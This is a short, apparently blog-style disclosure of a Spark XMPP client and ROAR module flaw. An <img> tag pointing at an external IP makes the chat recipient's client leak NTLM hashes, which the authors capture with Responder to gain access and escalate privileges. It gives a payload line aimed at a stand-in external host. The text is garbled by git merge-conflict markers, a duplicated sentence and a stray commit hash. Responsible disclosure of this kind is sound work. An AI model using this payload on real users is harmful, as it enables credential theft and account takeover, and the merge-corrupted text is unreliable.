<<<<<<< HEAD When @4nqr34z and myself, @theart42, were building a CTF box, we came accross an interesting
When @4nqr34z and myself, @theart42, were building a CTF box, we came accross an interesting
2e226274aae6df71614d40d24e76348b882194de vulnerability in the Spark XMPP client and its ROAR module.
When we opened a chat with another user, we could send an <img
tag to that user with an
external URL as the source of that image, like this:
<img src=[external_ip]/test.img>
Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
For our CTF box, this was golden. By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).
The developer has been notified and a fix is underway